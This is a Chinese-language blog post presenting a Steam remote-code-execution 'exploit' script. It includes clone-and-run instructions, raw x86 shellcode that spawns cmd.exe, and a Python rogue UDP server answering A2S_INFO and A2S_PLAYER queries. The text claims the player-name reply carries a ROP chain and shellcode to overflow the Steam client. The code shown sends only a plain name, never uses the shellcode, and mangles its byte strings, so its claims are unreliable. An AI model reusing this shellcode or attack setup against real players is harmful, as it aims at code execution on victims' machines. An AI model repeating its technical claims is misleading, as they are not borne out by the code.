Steam远程代码执行漏洞分析与利用脚本详解

本文详细分析了Steam服务器查询中的缓冲区溢出漏洞,通过Python脚本演示了如何利用A2S_PLAYER请求的Player Name字段实现远程代码执行,包含完整的漏洞利用代码和技术实现细节。

Steam远程代码执行漏洞分析与利用

描述

本脚本设置了一个UDP服务器来处理Steam服务器查询,特别是A2S_INFO和A2S_PLAYER请求。它演示了通过Player Name字段的缓冲区溢出漏洞在目标服务器上实现远程代码执行。

注意: 本脚本仅用于教育目的。未经授权使用此脚本测试非自有或未经明确许可的服务器或系统是非法的且不道德的。

使用方法

  1. 克隆存储库:
1
2
git clone https://github.com/SleepTheGod/Steam-Remote-Code-Execution.git
cd Steam-Remote-Code-Execution
  1. 安装所需的依赖项(如果有)。此脚本使用Python的标准库,因此不需要额外的依赖项。

  2. 运行脚本:

1
python steam_exploit.py

脚本概述

脚本包含以下关键组件:

  • UDP服务器: 在指定的主机和端口上监听传入的Steam服务器查询。
  • 请求类型检查: 确定传入查询是A2S_INFO还是A2S_PLAYER请求。
  • 响应创建: 为A2S_INFO和A2S_PLAYER请求生成适当的响应,包括用于远程代码执行的有效载荷。

漏洞利用细节

该漏洞利用利用了A2S_PLAYER响应的Player Name字段中的缓冲区溢出漏洞。脚本构建了一个包含ROP链和shellcode的有效载荷,以实现远程代码执行。

重要提示: 此脚本包含可能有害的代码。请在受控、授权的环境中负责任地使用。

法律免责声明

本项目仅用于教育目的。作者不对所提供信息的任何误用负责。未经授权的系统测试和利用是非法的且不道德的。

致谢

  • Valve Software提供了Steam服务器查询的文档。
  • 安全研究人员为理解和记录缓冲区溢出漏洞做出的贡献。

联系方式

如需更多信息,请通过存储库的问题跟踪器联系或提交拉取请求。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
import logging
import socket
import requests

### 服务器信息漏洞利用 - Player Name缓冲区溢出(Steam.exe - Windows 7、8和10)#######
# 更多信息:https://developer.valvesoftware.com/wiki/Server_queries

# Shellcode:打开cmd.exe
shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x90\x8b\x52\x78\x01\xda\x8b\x72\x20\x90\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x90\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x90\x01\xda\x31\xf6\x89\xd6\x31\xff\x89\xdf\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x65\x73\x73\x42\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\x31\xff\x89\xc7\xff\xd6\x83\xc4\x0c\x31\xc9\x51\x68\x64\x6c\x6c\x41\x88\x4c\x24\x03\x68\x6c\x33\x32\x2e\x68\x73\x68\x65\x6c\x54\x31\xd2\x89\xfa\x89\xc7\xff\xd2\x83\xc4\x0b\x31\xc9\x68\x41\x42\x42\x42\x88\x4c\x24\x01\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x54\x50\xff\xd6\x83\xc4\x0d\x31\xc9\x68\x65\x78\x65\x41\x88\x4c\x24\x03\x68\x63\x6d\x64\x2e\x54\x59\x31\xd2\x42\x52\x31\xd2\x52\x52\x51\x52\x52\xff\xd0\xff\xd7"

STEAM_API_KEY = 'YOUR_STEAM_API_KEY'
SERVER_IP = 'SERVER_IP_ADDRESS'
SERVER_PORT = 'SERVER_PORT'

def get_server_info():
    url = f"https://api.steampowered.com/ISteamApps/GetServersAtAddress/v1/?key={STEAM_API_KEY}&addr={SERVER_IP}:{SERVER_PORT}"
    response = requests.get(url)
    if response.status_code == 200:
        data = response.json()
        if data.get('response').get('servers'):
            return data['response']['servers'][0]
        else:
            return None
    else:
        return None

def udp_server(host="0.0.0.0", port=27015):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    print("[*] Starting UDP server on host: %s and port: %s" % (host, port))
    s.bind((host, port))
    while True:
        data, addr = s.recvfrom(128*1024)
        requestType = checkRequestType(data)
        if requestType == "INFO":
            response = createINFOReply()
        elif requestType == "PLAYER":
            response = createPLAYERReply()
            print("[+] Payload sent!")
        else:
            response = 'nope'
        s.sendto(response.encode(), addr)
        yield data

def checkRequestType(data):
    # 头字节包含请求类型
    header = data[4]
    if header == 0x54:
        print("[*] Received A2S_INFO request")
        return "INFO"
    elif header == 0x55:
        print("[*] Received A2S_PLAYER request")
        return "PLAYER"
    else:
        print("Unknown request")
        return "UNKNOWN"

def createINFOReply():
    server_info = get_server_info()
    if server_info:
        pre = "\xFF\xFF\xFF\xFF"                         # Pre (4 bytes)
        header = "\x49"                                  # Header (1 byte)
        protocol = "\x02"                                # Protocol version (1 byte)
        name = server_info.get('name', '') + "\x00"      # Server name (string)
        map_name = server_info.get('map', '') + "\x00"   # Map name (string)
        folder = "csgo" + "\x00"                         # Name of the folder containing the game files (string)
        game = "Counter-Strike: Global Offensive" + "\x00" # Game name (string)
        ID = "\xda\x02"                                  # Game ID (short)
        players = str(server_info.get('players', '')) + "\x00" # Amount of players in the server (byte)
        maxplayers = str(server_info.get('max_players', '')) + "\x00" # Max player allowed (byte)
        bots = "\x00"                                    # Bots in game (byte)
        server_type = "d"                                # Server type, d = dedicate (byte)
        environment = "l"                                # Hosted on windows linux or mac, l is linux (byte)
        visibility = "\x00"                              # Password needed? (byte)
        VAC = "\x01"                                     # VAC enabled? (byte)
        version = "1.3.6.7.1\x00"
        return pre + header + protocol + name + map_name + folder + game + ID + players + maxplayers + bots + server_type + environment + visibility + VAC + version
    else:
        return "No server info available"

def createPLAYERReply():
    # A2S_PLAYER响应
    # 此查询检索服务器上当前玩家的信息。
    pre = "\xFF\xFF\xFF\xFF"                        # Pre (4 bytes)
    header = "\x44"                                 # Header (1 byte)
    players = "\x01"                                # Amount of players (1 byte)
    indexPlayer1 = "\x01"                           # Index of player (1 byte)
    namePlayer1 = "PlayerName\x00"                  # Player name (string)
    scorePlayer1 = "\x00"                           # Player score (short)
    durationPlayer1 = "\x00"                        # Player duration (float)
    return pre + header + players + indexPlayer1 + namePlayer1 + scorePlayer1 + durationPlayer1

FORMAT_CONS = '%(asctime)s %(name)-12s %(levelname)8s\t%(message)s'
logging.basicConfig(level=logging.DEBUG, format=FORMAT_CONS)

if __name__ == "__main__":
    for data in udp_server():
        pass
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计